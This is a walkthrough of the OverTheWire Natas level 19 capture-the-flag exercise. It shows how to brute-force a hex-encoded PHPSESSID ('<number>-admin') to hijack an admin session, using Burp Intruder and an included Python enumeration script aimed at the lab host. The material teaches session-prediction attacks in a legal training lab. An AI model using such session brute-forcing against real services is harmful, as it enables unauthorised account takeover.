OverTheWire Natas level 19 → 20 is similar to level 18 → 19. Again we have to manipulate the session in order to log in as admin. In the last level, we only had to change the numeric PHPSESSID value to take over the admin's session. We have to do the same in this level, but here the PHPSESSID is hex-encoded: the cookie value is the ASCII hex of "<number>-<username>", so the candidate session IDs have to be encoded before they are sent. Let's dive into the level's walkthrough!
The hint for this level is pretty straightforward.
The header for this level (including the PHPSESSID cookie) looks like this.
If you hex-decode the cookie value, you will get this:
To carry out this attack, I used Burp Suite!
Send the request to Intruder, mark the PHPSESSID cookie value as the payload position and set the following options:
In the Payloads tab, use the same number range as in the previous level, with payload-processing rules that append "-admin" to each number and then hex-encode the result, so every request carries the encoded form of <number>-admin:
Start the attack and look for the one response that differs in length (the one that greets you as admin)!
Here is the screenshot of the request that got us the credentials for the next level!
There you go: the password for the next level.
If you hex-decode the PHPSESSID value of that request, the text string is 89-admin.
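The same brute force as a script, added here as an example and not part of the original walkthrough: it enumerates "<number>-admin", hex-encodes each candidate exactly as the level expects, and sends it as the PHPSESSID cookie until a response greets us as admin. The target URL, the "You are an admin" marker text and the upper bound of 640 (the range used by the previous level) are assumptions; the natas19 password is read from the environment rather than written into the script.

```python
import base64
import os
import urllib.request
from typing import Callable, Optional, Tuple

# Same numeric range as the previous level's session IDs
# (assumption: natas19 reuses it).
MAX_SESSION_NUMBER = 640


def encode_session_id(number: int, user: str = "admin") -> str:
    """Build a natas19-style PHPSESSID: the ASCII hex of '<number>-<user>'."""
    return f"{number}-{user}".encode("ascii").hex()


def decode_session_id(cookie_value: str) -> str:
    """Reverse of encode_session_id; raises ValueError on non-hex input."""
    return bytes.fromhex(cookie_value).decode("ascii")


def find_admin_session(
    probe: Callable[[str], bool],
    max_number: int = MAX_SESSION_NUMBER,
    user: str = "admin",
) -> Optional[Tuple[int, str]]:
    """Try every '<n>-<user>' session ID in order and return (n, hex) for the
    first one the probe accepts, or None if none of them is an admin session."""
    for number in range(1, max_number + 1):
        session_id = encode_session_id(number, user)
        if probe(session_id):
            return number, session_id
    return None


def make_http_probe(url: str, username: str, password: str) -> Callable[[str], bool]:
    """Return a probe that sends one request per candidate PHPSESSID (with HTTP
    Basic auth for the level itself) and reports whether the page greeted us as
    admin. The marker string is an assumption about the level's output."""
    token = base64.b64encode(f"{username}:{password}".encode()).decode()

    def probe(session_id: str) -> bool:
        req = urllib.request.Request(
            url,
            headers={
                "Authorization": f"Basic {token}",
                "Cookie": f"PHPSESSID={session_id}",
            },
        )
        with urllib.request.urlopen(req, timeout=10) as resp:
            body = resp.read().decode("utf-8", errors="replace")
        return "You are an admin" in body

    return probe


if __name__ == "__main__":
    # Assumed target URL; the natas19 password comes from NATAS19_PASS.
    target = "http://natas19.natas.labs.overthewire.org/"
    hit = find_admin_session(
        make_http_probe(target, "natas19", os.environ["NATAS19_PASS"])
    )
    if hit is None:
        print("no admin session found in range")
    else:
        number, session_id = hit
        print(f"admin session: PHPSESSID={session_id} ({decode_session_id(session_id)})")
```

The search logic is separated from the HTTP probe so it can be exercised offline with a fake probe; with the real probe it stops at the first admin hit, which for the run shown above is the hex encoding of 89-admin.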